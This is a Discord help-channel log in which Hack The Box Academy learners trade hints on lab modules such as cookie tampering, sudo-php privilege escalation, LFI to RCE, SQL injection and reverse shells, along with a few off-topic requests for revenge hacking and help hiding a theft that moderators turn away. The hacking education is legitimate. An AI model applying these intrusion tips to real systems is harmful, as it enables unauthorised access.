#modules

1 messages · Page 498 of 1

rustic sage
#

Someone told me that The HTB machines give different output once decoded with base64

#

Than our own ones (Parrot,kali on Oracle Vbox for example)

#

Is this actually the solution to my problem?

#

The different machines?

#

I've been trying God knows what this half an hour or 40 minutes but I am a headbanger honestly

#

On the cookie manipulation I can change the name I guess

#

But what else?

rustic sage
#

Nah, it's same stuff

#

Provided box or my own

#

No different encoding

#

Aight, I am going to sleep

#

For now

flint moth
#

If you know the answer but struggling in right format then it's same format as In the sub-heading in that page

daring tusk
flint moth
#

Btw you got the answer now?!

daring tusk
#

Nah, I went to bed and decided to work on some hackthebox machines instead. I'm hoping when I go back and re-reading it, it will shop up. Let me know if you figure it out pls 😅

flint moth
#

I have already done it

hollow flame
#

so im on the last section in the getting started module i got the user flag now for the root flag i need to privesc i got the user flag from meterpreter exploit the problem now is that since its a meterpreter session/shell whatever i cant run bash scripts or python3 to make it bash or wget to get linenum to that box

#

oh wait

#

shell

tough fjord
#

Well done!

hollow flame
#

i got the admin pass too

#

but i still dont get how will i privesc

tough fjord
#

Always good to see people figure out the solution before help is given

#

This is nibbles isnt it?

hollow flame
#

i did nibbles

tough fjord
#

Ah. I'm not sure on that one then

hollow flame
#

oh

tough fjord
#

Have you checked what you can run as root?

hollow flame
#

yep its php

#

php reverse shell?thonk

tough fjord
#

So you can do sudo php <whatever you want>?

hollow flame
#

its that easy?

tough fjord
#

I dunno. Is it fingerguns

hollow flame
#

sudo php <can i put bash here>

tough fjord
#

Not bash. But if you look at what you can do with php you have lots of options available

hollow flame
#

hmmm

tough fjord
#

Its a programming language so there are lots of things it can do

#

Also for future reference - if you see you can run something with sudo it is worth checking a site called gtfobins.

hollow flame
#

ohk

hollow flame
#

YAYAYYAYAY

#

I DID IT

crude kettle
#

Yo boys please raise your hand ✋ if your doing or already done tier 0 , Getting started module , i have some doubts not for answers !

hollow flame
#

i can give hints

#

like i JUST JUST completed it

crude kettle
#

Alright 😄

#

Brother types of shells im currently right now.

hollow flame
#

which section

#

oh

#

ok

crude kettle
#

Is it really essential to learn all reverse shell commands they provided , like python , powershell commands to attain reverse shell.

hollow flame
#

in the first starting point machine archetype we have to use a powershell reverse shell

#

pretty hard module

crude kettle
#

Ohh. Right , is it okay to use cheat sheets , i aint feel right using it 😬

hollow flame
crude kettle
#

Ohh so its fine to use even in exams? , I use help command sometimes when im stuck . I feel its ok but this aint.

tough fjord
#

I've been doing this for years

tough fjord
#

and still use cheatsheets fingerguns

#

some I know off top of my head through use, but some I just copy paste from my notes

hollow flame
#

yeah

crude kettle
#

But sometimes help or man dont gives me the thing that i was looking for. .😅🤦🏽‍♂️

hollow flame
#

why is the path cost 1k when the 2 modules inside are only 200 combined lmao

tough fjord
#

the 200 is how many cubes back you get

#

not the cost I think

crude kettle
hollow flame
#

oh

#

ok

#

i only have 40 rn very_sadge i have to convince mom to buy me more

tough fjord
#

work through all the tier0 ones first

#

if you are a student you can subscribe at a reduced cost

crude kettle
#

@hollow flame have you byheart other commands in reverse shell section?

hollow flame
crude kettle
hollow flame
#

just keep all of them in a folder or something with the correct file extensions or however u wanna organize

hollow flame
crude kettle
#

Hmm

#

@hollow flame you tried making web shell?

spark locust
#

Hey all ! How are you doing ? I kinda have a dumb question : i'm starting with HTB & am at the end of the 'Getting Started' in the "Knowledge Check" section. I kinda have no problem, i'm gained a foothold in the target and everything but the shell keeps dying on its own after I input 3 or 4 commands. Do you know how I can fix that ? Thanks for your help

unique valve
#

If someone hasn’t already helped you, feel free to DM me.

unkempt marten
#

Doing Intro to Network Analysis, section 2 (Networking layers 1-4).

What addressing mechanism is used at the Link Layer of the TCP/IP model?

#

I've tried MAC (address) in several forms and none works

#

Is it not MAC, or am I missing a form?

flint moth
unkempt marten
#

that works, thanks

rustic sage
#

Guys

#

Can someone give me a hand on the cracking into HTB path

#

Module 1

#

Section POST methods

#

It tells me I have to manipulate cookies somehow to gain admin_user

#

But I have no idea

#

been trying since last day

#

I would appreciate some additional hints

#

I logged in with username guest and password guest and captured cookie

#

One thing I noticed

#

The cookie on my side is auth

#

While on the course its PHPSESSID

#

I try to change its values

#

Most of the time the last 3-4 characters cannot be changed

#

But the username that is displayed after the welcome message can

#

Any idea if I am on the right path or guidance?

potent mirage
#

Lol I just came here with the same questions.

#

NICE!!!!

lucid veldt
#

HAs anyone here used what they learned in the Buffer Overflow modules to earn the OSCP?

rustic sage
#

Sure, but my question is what do I need to do, in what way do I manipulate the cookie?

#

Like when I login, it takes me to the admin panel and says welcome guest

#

That's what I have been trying to figure out

tough fjord
#

have you used burpsuite before?

mystic perch
#

I converted the LFI vulnerability to RCE. But I'm a nobody user on Linux. Please give me a hint on how to upgrade this.

iron tartan
#

Aight I’m stumped

#

I’m on the Host and port scanning section of Network Enumeration with Nmap module

#

I completed the first question to find all the TCP ports, however I can’t seem to figure out what the host name of the target it

#

No idea where to go from there

drifting knoll
#

@iron tartan pls be careful with spoilers

#

our flags have the following format: HTB{xxxxxxxx}

iron tartan
#

sorry, I’ll use that next time

drifting knoll
#

that was actually a hint

iron tartan
#

right, translating it from l33t it seems to refer to another port service that I need to get the banner for

#

however I have no clue how to get it as all the ports that might be related to it are closed

drifting knoll
#

read it carefully

#

the flag you have to submit as the answer has the following format:
HTB{xxxxxxxxxx}

iron tartan
#

I’m really good at digging way too deep

#

I wasn’t thinking about the question after I had gotten that flag

#

I still don’t understand how the flag relates if it does but

flint moth
#

@rustic sage I gave a major spoiler in that maybe 😀 ( deleted that msg), you can dm me if you need help

warm sinew
#

Yoo someone help me out

deep patio
warm sinew
#

Alright so yesterday I stole my little he’s 6 cousins Nintendo switch and sold it idk why and there trying to find it but couldn’t they asked me twice and I said idk where it is I’m going to there house tomorrow so they might ask me questions but my older cousins are coming from vacation on Monday and they love the switch so there gonna do some serious investigation I mean there’s no evidence it was me because no one knew where it was at but im scared I might get caught because there the real deal

deep patio
#

yeah, that is completely irrelevant to anything we do here...

warm sinew
#

Oh

#

Ok than

unkempt marten
#

Doing LFI module, last section. I've got index.php but don't quite know where to go next. I can't seem to use null byte to read non-php files, and wrappers don't seem to work.

limpid ledge
#

can anyone teach mme hackin

novel matrix
red obsidianBOT
rustic sage
tough fjord
#

Give it a go

mystic perch
tough fjord
#

You have rce? Then you should be able to read the flag

unkempt marten
#

No RCE yet, just exfiltrated source code of index.php

mystic perch
tough fjord
#

You should just look through the directories

rustic sage
#

Okay, I don't understand

#

After logging in a s admin

#

And clearing my cookies

#

I steal the cookie

#

And after I try to relog and when sending the POST method

#

I insert that same cookie

#

But on GET I return a different one

#

Why

scarlet finch
rustic sage
#

Yes on the Cracking into HTB path

#

I have been fighting since 2 days

#

With a single section

#

fml

#

I re-read the section, but I am clueless on what to do

#

I am experimenting

scarlet finch
# rustic sage I insert that same cookie

Yeah but why u insert the same cookie. Because u were trying to log as guest but when u sent the post request it shows u the guest cookie and not the admin cookie

rustic sage
#

No no

#

First

#

I log in as admin

#

And save that cookie

#

Now I will log in as guet

#

guest

#

And send the admin cookie

#

To see what will happen

scarlet finch
rustic sage
#

I see

heady peak
#

heyy

rustic sage
#

So, I need to edit the cookie

#

?

#

And on base64 put admin

#

?

#

instead of guest

#

or

scarlet finch
#
Login with the credentials (guest:guest), and try to get to the admin user from what you learned in this section and the previous section.
``` If u follow exactly what it says u will have smth. U have to login as guest and then if u intercept the request u we have that ```bash
POST /login.php HTTP/1.1
Host: 142.93.35.92:32627
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://142.93.35.92:32627
Connection: close
Referer: http://142.93.35.92:32627/login.php
Upgrade-Insecure-Requests: 1

username=guest&password=guest
``` but a little nudge. Click on the forward thing after intercept this
scarlet finch
rustic sage
#

Why did it not work when I tried

#

A day ago

scarlet finch
rustic sage
#

I did

#

I know that I have to use something in that section

#

Or the previous

#

And I did intercept the request after forwarding that

#

BIRBY is my asvior

#

savior*

#

@scarlet finch

clear basin
#

Need help on buffer overflow module anyone up?

flint moth
rustic sage
#

Is this code deobfuscated?

#

Or not?

#

I think it is

#

I need the flag on var flag and when I stitch it together it says it is wrong

#

How is it wrong

flint moth
rustic sage
#

Well, why is it not accepting my flag then

#

That's cringe again

#

Probably some little stupid thing I am missing

flint moth
#

I think you should not post any flag

rustic sage
#

oke

#

It still does accept wrong

flint moth
#

You submitting the flag like HTB{xyz} ? @rustic sage

rustic sage
#

Yes

rustic sage
#

Hey, I really need some help

#

I think something is not working

#

Like, I think I got the flag, but it just does not want to accept it

#

It's literally HTB{flag}

rustic sage
#

Never mind

#

All is good

#

This time it was my mistake

#

again

#

lmao

tough fjord
#

at least you are learning fingerguns

rustic sage
#

Y

#

Correct my dear Agent

#

We all learn from our mistakes

#

This time I missed some signs

#

While stitching up the flag

young sleet
#

anyone who could help me in the Getting started module Public Exploit section

iron tartan
sly nebula
#

I could use some direction on Windows Privilege Escalation Skills Assessment - Part I. I cannot find the requested password, nor can I escalate privileges. I tried pretty much everything explained in the course.

potent mirage
#

A problem here with gobuster. I can gobuster dns inlanefreight.com, but I cannot do the same with the ip address 188.166.173.208:31163

#

This is in the Academy on Pentesting Basics > Web Enumeration.

lapis gazelle
#

Can anyone please help me with 'Cracking passwords with hashcat'

Cracking Common Hashes section

I need help in pointing out what to do... I have tried every rule set that hashcat provides on the MD5 mode. What am I missing here? Is it not MD5? Every place I look for the hash, it points me towards MD5 but none of my cracks are finding anything. Thanks

craggy vapor
#

I'm working to get a reverse shell for the Skill Assessment on the Wordpress, and right now i'm doing a password attack with the rockyou list (assuming I want to get RCE via the theme editor). Am I wasting my time, is there another way to go about it?

rustic sage
#

I am unable to connect to websites in the VPN Instances. inlanefreight.com & 46.101.23.188:31395

valid oxide
#

Anyone working on NMAP, IDS/IPS evasion Hard lab?

bright drift
marsh laurel
#

I am currently working on File Inclusion and Directory Tranversal Module. I am stuck on one question under the "Hardening Tips" section :

#

I have added the system to be blocked in the php.ini file but how do I run System command in php to see if the command is blocked?

surreal scroll
#

Hi guys, working on sql injection fundamental and I'm stuck in this question "Try to log in as the user 'tom'. What is the flag value shown after you successfully log in?". I've successful to log in but there is no flag in there, anyone can help me?

south mortar
#

Can you use your own vm in HTB Academy?

valid oxide
#

@south mortar in some modules yes, not all, but the option is there when you can

jagged zenith
#

@drifting knoll We need module powershell and poviting,

rustic sage
rustic sage
#

Try to create the 'ids.txt' wordlist, identify the accepted value with a fuzzing scan, and then use it in a 'POST' request with 'curl' to collect the flag. What is the content of the flag?....I need help in this attacking web applications with ffuf module

hexed lantern
#

hi,am on the "windows fundamentals" second section: "operating system structure" but i don't think i am doing the exercise right. Can anyone help

potent mirage
marsh laurel
#

I am on the final stage of Skills Assessment - File Inclusion/Directory Traversal
I need help as I am stuck, I have decoded the index file and read the php snippet code but I am stuck to were do i go from here. Can anyone help me

rustic sage
#

Hey guys, didn't know if anyone had any pointers for the ffuf section

#

I am value fuzzing but having a time.... I am not sure about the URL. Any hints would be great.

unkempt marten
#

Doing LFI, skill assessment. I can't include non-php files (%00 doesn't seem to work), there's no session cookie to poison, and the wrappers with code execution aren't working. I've got the code for index.php cut that's it for now. Can I get a hint?

unkempt marten
#

I used base64 to get index.php, the other php pages don't seem to have anything interesting

flint moth
rancid holly
#

can anyone please give me some tips regarding how to solve File Inclusion skill assessment

unkempt marten
#

found it url

#

btw is .well in scope? I don't think I'm supposed to bust it

marsh laurel
#

Read the basic LFI again, the clue is there what you need to get detailed information

#

I yesterday spent 7 hours and eventually cracked it, but the solution was right in front of me and I was kicking myself that I should be more thorough. It felt good when I accomplished it.

low echo
#

Can anyone confirm some of my answers for the BloodHound module?

unkempt marten
#

LFI, assessment. I'm on the admin page. I've tried all the wrappers, RFI doesn' work either. I can grab /etc/passwd but can't seem to get code execution.

marsh laurel
#

In the LFI tutorial look over the basics of code execution

rustic sage
#

||lux is on fire||

rustic sage
#

hi

rustic sage
#

hey..how you doinn?

vapid topaz
#

hi

#

any one give me some cubes??

rustic sage
#

i need some too....i completed all the modules but i want some for higher level modules

vapid topaz
timid mirage
#

is there anyway to connect to academy targets using my personal kali installation?

flint moth
tough fjord
#

#giveaways for a chance to win 500 cubds @vapid topaz @rustic sage

sly sentinel
#

but when i try to get the /flag.php nothing comes up

#

I made sure i'm using backticks

#

and i'm kinda lost

rustic sage
#

try <?php insted of <?=

sly sentinel
#

i'm going to reset the machine and try that

#

nope still void

tough fjord
#

If there is no vpn pack by the questions its probably a public facing docker instance

timid mirage
rustic sage
#

you do not need to connect to dockers

#

if there is "GET VPN Key".....you do not need to connect to it...use directly

#

dude this is not fair....we have to spend 50 cubes and then only get 10 as a result

#

i want to start harder levels but cannot due to no cubes

timid mirage
#

I am doing the getting started module and there is no vpn key option. i already used my workstation instance but had to leave so it expired

#

now I cant complete any challenges and have to wait

tough fjord
#

You can. If it is docker then you connect the same way you would with the workstation

tough fjord
hollow flame
hollow flame
#

I'll tell

timid mirage
#

ok

potent mirage
#

Alrighty bois I've been stuck on this section for over 24 hours. I feel like I'm one mistake away from the flag, but after trying everything I know and searching everyone else's help messages, I've come to the conclusion that I need to start a new question.

Module: Getting Started
Section: Public Exploits

#

PLEASE help me I've exhausted every method I've learned thus far. I've looked at previous sections and reviewed information, but to no avail.
I have the ip address : 142.93.35.92:30027
I have the exploit : https://www.exploit-db.com/raw/39883

nova spoke
#

Hello, i have a problem in the fuzz module in Basic fuzzing section. I fuzzed with ffuf but i find nothing

#

is there a problem

#

because my command is exactly what the module teach me to do

#

||ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u https://IP_ADDRESS/FUZZ||

#

there is no results

vapid topaz
flint moth
flint moth
nova spoke
#

This was the problem

potent mirage
#

I also tried /WordPress/root/simple-backup/flag.txt.
At this point, I'm just guessing. Is there not a better way?

#

It's not actually setting up a shell or downloading anything from what I can tell.

knotty hemlock
#

Hi, I have a connection problem in the NTFS vs. Share Permissions of the Windows Fundamentals. I can rdesktop to the windows desktop without problems, but when I try to access the same IP via smbclient, I get the following error:

#

do_connect: Connection to failed (Error NT_STATUS_IO_TIMEOUT)

#

I tried from Kali Linux and Ubuntu Linux without success. Any ideas?

#

sudo doesn't help either..

golden tartan
#

any hints for final SQLMAP Essentials skills assessment? Am either getting an error saying factor is not injectable or error 400 bad request.

flint moth
flint moth
low echo
#

Could anyone check 2 of my answers for the BloodHound module? I can't seem to get them through even after trying a few variations to hit the 'case sensitive' filter

potent mirage
flint moth
potent mirage
flint moth
potent mirage
potent mirage
flint moth
#

Not this on , one in which path is set to /flag.txt as given in question

unkempt marten
#

Doing File inclusion, Skill assessment. Got to admin, tried all the wrappers & RFI, nothing works, can't poison either. Can I get a hint?

timid mirage
hollow flame
#

oh ok i just woke up

young sleet
nocturne mural
#

hi

#

Im here becuz my server got hacked they banned all the 50 members and i want revenge

young sleet
#

hi can anyone help me out

#

i get this error when i run the command on my setup but on pwnbox it works fine?

rustic sage
#

on your setup...you should be connected to the vpn of academy...on pwnbox it is not required

marsh laurel
# young sleet

I think I had this problem I think it was that the server was busy. You can try using dirbuster

unkempt marten
#

Doing SQL injection, section "union clause". It's telling me to connect to the mysql db but doesn't provide cresd, root:password doesn't seem to work.

tough fjord
#

Not a hack for hire server dude. Contact discord support

mild mica
#

can someone help me out on the sqli academy part? I have already bypassed with 'or 1=1-- and I have looked through every single database and every single important table and column and all its information and I can't find the flag. Unless if im supposed to get the flag by doing something else other than accessing the databases information, i don't know. I am so confused

#

this is the real life example, the last part of sqli topic

flint moth
#

Can anyone give me a little nudge Module : Network Traffic Analysis
Q: what is the filename of image that contains Transformer Leader!
In the hint it listed some files which should have been pulled
But I can't found any of them

valid oxide
#

hello, is it possible to do the ffuf skill assessment from my own vm. I can't seem to resole the academy.htb with my own box. I've added the ip to my /etc/hosts.

#

nvm I see that I can, guess I was just having trouble with it last time.

tribal remnant
#

Hashcat module wifi lecture: is the mic.hccapx supposed to be cracked using rockyou.txt? It got exhausted, tried many dict/rule combinations, or am I messed sthing up? My cpu is melting... 🙂

rustic sage
#

use correct wordlists with right path

valid oxide
#

yes its working for me today. yesterday it would not resolve

rustic sage
#

goof

#

good

#

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

#

this is the final question on file inclusion module...plz help

knotty hemlock
potent mirage
#

I tried changing the networking type on VirtualBox from NAT to NAT Network and Bridged Adapter, but to no avail.

dusk thistle
#

hey anybody know how can i take down websites and thinks like that

#

i could use that with my current job

tough fjord
#

how do you mean?

knotty hemlock
#

Hi, can somebody help me with the Skills Assessment of the Windows Fundamentals? It says "Create a security group called HR". I found out how to create a group, but where is the option to make a "security group"...? When I try to google, I only get results for Active Directory, Azure and so on...

knotty hemlock
#

OK, I guess I was overthinking. In the end i solved all questions with the group I created...

charred scarab
#

What channel can I ask a queation?

urban sage
#

Question about what?

potent mirage
# potent mirage Alrighty bois I've been stuck on this section for over 24 hours. I feel like I'm...

It's been 48 hours and I am still unable to access the flag.txt file. During port scans I found an open port 31337, but duplicating my efforts on that port proved fruitless.

At this point, I would very much appreciate a direct walk-through for Module: Getting Started, Section: Public Exploits.

I believe that there is an unforeseen bug in my system, as I have already read all previous conversations about this section and had a private dm to no avail.

high furnace
#

what are the best module i should go through to become a good pentester?

tough fjord
crude kettle
flint moth
#

I am stuck on Network Traffic Analysis [Packet Interception Wireshark] , how long should I capture traffic ? Since I am not able to a find a file which is asked

tribal remnant
#

anyone who've completed the hashcat module? I could use a nudge for wifi section.

empty forum
#

So, i was looking into Hackthebox.eu Linux Fundamentals, but i'm out of VM Spawns. Do i need the VIP+? Or is it possible the run the VM on my own computer with VB?

tribal remnant
#

you may call it a day, to get a fresh spawn, or you can create a hacking installation of your own, so you can connect from there

empty forum
#

What iso would you recommend?

crude kettle
#

Install any pentesting distro

tribal remnant
#

htb recommends parrot, however, I use kali live usb with persistence, so I did not need to erase my fedora workstation

crude kettle
#

Connect via vpn thats it

#

More speed much reliable

empty forum
#

I'll check it out @crude kettle

crude kettle
empty forum
#

@crude kettle Cool thank you!

#

@tribal remnant Ah oke

ebon wigeon
#

@abstract hollow

tribal remnant
#

in the meantime I'm still struggling with the mic.hccapx, the pmkid was successfully cracked with rockyou, but the mic pw isn't there... could any1 give a clue, where I messed up and what? I'm stuck I'd say.

ocean brook
#

Does HTB not have a vpn for academy?

languid fjord
#

thanks

urban sage
ocean brook
urban sage
ocean brook
urban sage
#

No problem. Happy hacking!

signal panther
#

Good day everyone! I'm having some issues understanding what am I doing wrong in the Windows Fundamentals module. I'm in the part in which you need to configure SMB to share a folder between the PWNBOX and a Windows machine. I've followed all steps in the module but still I haven't managed how to mount the folder.

Can anybody help me please?

#

I can't even ping the target machine :S

clever imp
#

Buona sera!

SQLMAP Essentials

What's the contents of table flag4? (Case #4)

I have saved the req headers to a file added the json payload, and am running sqlmap with -r flag on the file, but not getting anywhere with it.

[CRITICAL] all tested parameters do not appear to be injectable. 

plz halp

#

dafuq? @urban sage @jaunty axle @languid fjord

languid fjord
#

thanks

#

++Rm @forest temple 666w spam

clever imp
#

sure thing

red obsidianBOT
#

DreF has been banned for a duration of 666w for "spam"

jaunty axle
#

thanks for letting us know

young sleet
#

hey anyone who could help me with the internet speed issue on my virtual box it's super slow in the guest os but everything runs smoothly in the host os?

#

possibly some change in the settings might help me

lucid veldt
#

I cannot connect to the Windows machine in the Windows Buffer Overflow room. I've entered the correct credentials, but not luck

#

Tried resetting the target, still no difference

quiet wadi
#

I'm trying to use WPScan on a target for the hacking wordpress skills assessment but I'm getting the message that "The remote website is up, but does not seem to be running WordPress". running --force didn't work either. Has anyone run into this?

quiet wadi
#

Either I'm doing something terribly wrong (very possible) or the wp-content directory doesn't exist on this wordpress skills assessment.

bronze ruin
#

THX man

unkempt marten
#

Doing File inclusion, skill assessment. I'm on the admin page, and I'd like some sanity check seeing as my RCE isn't working.

oak summit
#

hey anyone here for linux module which i dont know what im doing wrong

random iris
#

Hi can anyone help with the Windows Fundamentals - Skills Assessment final question? I am having trouble getting the correct SDDL string. Here is my powershell output. I have followed the steps in setting permissions on the folders but am unsure what the issue is.

PS C:\WINDOWS\system32> Get-Acl -Path 'C:\Users\htb-student\Desktop\Company Data\HR' | Format-List

Path : Microsoft.PowerShell.Core\FileSystem::C:\Users\htb-student\Desktop\Company
Data\HR
Owner : WS01\htb-student
Group : WS01\None
Access : WS01\HR Allow Modify, Synchronize
Audit :
Sddl : O:S-1-5-21-2614195641-1726409526-3792725429-1002G:S-1-5-21-2614195641-1726409
526-3792725429-513D:PAI(A;OICI;0x1301bf;;;S-1-5-21-2614195641-1726409526-3792
725429-1004)

oak summit
#

i dont know what im doing wrong here guys any help

oak summit
unique valve
random iris
unique valve
#

Feel free to DM me

random iris
#

okay

rustic sage
#

Is there really no vpn file for getting started priv esc? I’m unable to upload linpeas to the docker box with wget/python or use bash to get the reverse shell to my external ip. I’ve done both these things many times on htb being connected to the vpn and using my 10.10.x.x ip. But with no vpn/tun0 connection all I have is my external and 192.168.x.x which it’s not going to see.

stiff stream
#

Has anyone else had problems with pwnbox/vpn file for ssh ing to target machine, I keep getting timeout messages? Also tried both using pwnbox or vpn file, same result.

crude kettle
#

Yes I have encountered this problem

#

You try downloading new that vpn file again and use openvpn to that vpn file.

stiff stream
#

Yeah, tried redownloading, restarted my computer, tried pinging the target host (no reply), it's weird

unkempt marten
#

I had problems with VPN. Using UDP instead of TCP solved it

#

When downloading your VPN file, use UDP instead of TCP

stiff stream
#

@unkempt marten cheers contacted support, they were able to solve it!

clever imp
#

SQLMAP Essentials - Skills Assessment

I have the final_flag, but htb wont accept it. Are there multiple final_flags?

safe token
#

hey

#

im doing the JAVASCRIPT DEOBFUSCATION and im at part decoding

#

i allready got the decoded the thing i needed but for some reason it doesn't accept it

#

any guess?

#

this is the question
To get the flag, you can send a 'POST' request to 'serial.php', and set the data as "serial=YOUR_DECODED_OUTPUT".
but even if i enter my answer as mention like serial=decoded_stuff i get incorrect answer

iron goblet
#

Is there anyone willing to help me with a module

stiff stream
#

@clever imp Should be only one, need help with it?

clever imp
#

In the end I got help. It was really strange. My final_flag had one character diff. Not sure why.

#

But thank you!

stiff stream
#

took me like a hour or so to get that flag 😄

jagged zenith
#

We need module powershell

tough fjord
#

probably one in the works

#

anyone else noticed this....

jagged zenith
tough fjord
#

yeah, it wouldn't be available until it was finished

jagged zenith
#

40 %

#

my account

stray prairie
#

is there any way to do the modules on your own linux ?

bright drift
proven jay
#

Hey, does anyone know when the modules in the junior penetration tester path will open up?

stiff stream
#

@proven jay gotta have patience, they'll be open when they are ready, I'm sure dev team are doing best they can to make it avaible asap

#

Also super glad to broaden my skills with that path, academy is incredible place indeed

tough fjord
#

Not sure on exact timeline but looks like some cool modules coming

tough fjord
#

No idea.

surreal rain
sick gull
#

Module: Windows Privilege Escalation; Communications with Processes; “Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?”

#

Not sure how to do it without the accesschk.exe, it’s not there on the box

past maple
#

Split the network 10.200.20.0/27 into 4 subnets and submit the broadcast address of the 2nd subnet as the answer.
Can any one explain this question?

flint moth
past maple
#

Thanks, help a lot,....

lilac jungle
#

Can I dm someone who can help me in File inclusion skill assessment or the last question of the module?

lilac jungle
#

I am struggling in last question.

jagged zenith
jagged zenith
jagged zenith
jagged zenith
daring cedar
#

Hello i am kinda stuck on the Public exploits module to get the flag of the Wordpress website using the simple backup plugin exploit

lilac jungle
#

Okay man @jagged zenith thanks for help, let me give it one more shot.

daring cedar
jagged zenith
jagged zenith
daring cedar
jagged zenith
daring cedar
#

i bought it with the 50 free cubes they give you

jagged zenith
jagged zenith
daring cedar
#

it is not in the wordpress one, it is in the Pentesting basics module

jagged zenith
#

I need to work for a whole month on hard work, for 100 Cubes

jagged zenith
#

Getting Started?

daring cedar
jagged zenith
#

Name section

daring cedar
#

public exploits

jagged zenith
#

Or use wpscan

primal sundial
#

kek @languid fjord ^^

languid fjord
#

++rm @rustic sage 666w phish

red obsidianBOT
#

DaGoN1984 has been banned for a duration of 666w for "phish"

surreal rain
knotty hemlock
#

hi, i'm at the "OSINT Corporate Recon" module, section "domain structure". I'm stuck at the question about the hosting provider - I'm quite sure I've found the right one but somehow it doesn't accept the name, can somebody please help me?

exotic field
#

hello!
I've got a problem with one task in Hacking Wordpress - Skills Assessment.

I got everything but "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.".
Do you have any tips which file includes a flag, because i can't get it?

#

Searched the whole filesystem for other flag files. Nothing.

Grep searched the whole filesystem for files containing 'HTB'. Nothing.

Manually went through /plugins/ folder hoping to find that file that contains the flag. Nothing.

sick gull
proven jay
#

Hi, I'm working on the module "Login brute forcing", and I'm on the final section. There is a mention of an employees username, I can't figure out what they are talking about. Am I missing something obvious, or are they talking about bill and melinda gates from a couple sections before

fallow delta
#

anyone available for a nudge on Windows Privesc - Interacting with Users?

shrewd sorrel
#

In JavaScript Deobfuscation - Decoding, if I send a POST with the serial through the Repeater in Burp I get the standard message, but if I do exactly the same through cURL I get the correct flag.

#

Can someone explain me why the difference?

flint moth
rancid holly
#

someone please give some hint regarding the File inclusion skill assessment. I have tried this exercise many times now but haven't any progress

flint moth
round hill
#

Hi all, I need little help on the GET module (I know very easy and for noob only eheh) the qestion is"Send a GET request to flag.php with two parameters num1 and num2 such that their sum is 1337." I tried with "http://admin:password@xxx.xxx.xxx.xx:xxxx/flag.php?1000&337" with all the variants That came in my mind, but nothing, I really don't understand what I do wrong...

tough fjord
#

@round hill i dont see param num1 and num2 in your request. Have another read of the section and look at the requests closely

round hill
#

I thougt I have to put numbers instead of num1 and num2! what dumb am i! ehehe okok I'll try. thanks a lot for the hint

sick gull
#

So I did find it, ran it and it’s asking for what specific account but the only thing it populates with is WRITE_DAC under “RW NT SERVICE\MYSQL$SQLEXPRESS01”

#

@surreal rain

surreal rain
#

what is the question again?

sick gull
#

Under windows priv escalation : “Which account has WRITE_DAC privileges over the pipe\SQLLocal\SQLExpress01 named pipe”

#

The command I run:
accesschk -accepteula -w \pipe\SQLLocal\SQLExpress01 -v

surreal rain
#

pm me a screenshot

stiff stream
#

Has someone done the linux privilege escalation module? I'm kinda stuck at last flag

radiant coyote
#

Hi on Hacking Wordpress module I'm stuck on skills assessments. To identify wordpress version number. I ran wpscans it shows that website does not run on wordpress. so I start try nmap to scan the ports but I see only 2 ports opening 22 ssh, 80 apache. Does anyone can give me some suggestion?

fallow delta
#

Looking for a nudge on Windows Privesc - Interacting with Users if anyone is available 🙂

torn sapphire
#

Hello all , Guys I am new here, I would like to learn hacking, can any one plzz, let me know how and where to start in the server, because I am unable to see any resource for learning, some help would be useful, Thanks in advance

high zinc
#

oke

red obsidianBOT
high zinc
#

tell your cousin he's a booboohead and owes me a Coke

surreal rain
#

what?

rustic sage
#

Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)

#

am I incompetent

#

-Xr /tmp/capture.pcap

#

I tried so many variations

#

and still cannot get the answer

#

Does someone know it?

#

this question is part of the Network Traffic Analysis module

torn sapphire
night pasture
#

I’ve just signed up for the academy and subscribed then found that a few of the modules on the junior pen route aren’t actually available yet, any idea when they will be?

novel matrix
#

We just have to wait and be patient.

night pasture
short vale
#

on ffuf module: subdomain fuzzing does not give any results even though the subdomains are in the wordlist - is the command wrong? it's the same as given just other hostname

#

oh I wrote lowercase nvm

plain sinew
#

anyone here to help me with a module?

#

im having an issue with Skills Assessment - WordPress last assement when i spawn a new ip i don't get a WordPress website but a normal apache website

unique star
rustic sage
round hill
#

hi everyone, I still need help on the GET module; I'm really stuck and I can't understand what I'm doing wrong: the question is to send a GET request to a flag.php (of a gave target I supposed) with two parameters, num1 and num2 and the sum of them must be 1337, so i write http://admin:password@xxx.xxx.xxx.xxx:xxxxx/flag.php?num1=1000&num2=337 and it gaves me incorrect answer. Now, I know is easy and probably is a really stupid question but are like two days I'm on it, I readed the module 10 times and studied external resources and I can't understand what I'm doing wrong. Could somebody please explain me what am I doing wrong?

#

btw thanks everyone I'll keep trying

floral blade
plucky fjord
#

Is there anyone who had solved the HTB academy's "Skill Assessment -File inclusion / Directory Traversal" ??

dreamy pecan
dreamy pecan
# dreamy pecan

Can anyone please explain to me, why is written as ".conf" and not "config" when the question ask "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?". And what was the "." for.

knotty hemlock
plucky fjord
dreamy pecan
rustic sage
jagged zenith
#

New moudels when

stiff stream
#

@jagged zenith u excited huh

jagged zenith
stiff stream
#

I am too, but we need to have patience 🙂

jagged zenith
#

finished

urban sage
#

Huzzah! Well done!

jagged zenith
#

I have some cubes i want subscribe new moudels

surreal rain
#

Congrats! We are getting modules out as fast as we can!

stiff stream
#

@surreal rain Thanks for all the hard work and effort you're putting for these new modules! I'm not sure if this has been ever discussed before or is there channel for suggestion but would it be possible to create a module for like enterprise networks?

surreal rain
#

I appreciate the kind words, however, I'm a very small part of a team. What would be some things you would be interested in seeing in such a module?

stiff stream
#

I was thinking like basic enumeration (How to approach enterprises, how does it differ from single machines, several flags and then getting to root)- close to what Dante and pro labs have so that people would have more practical aproach in academy and thanks to that knowledge that they get from academy, could be beneficial in HTB as well or even career wise.

surreal rain
stiff stream
#

Oh, didint even notice that, mrb3n was step ahead of me 😂

#

Sweet thanks!

surreal rain
#

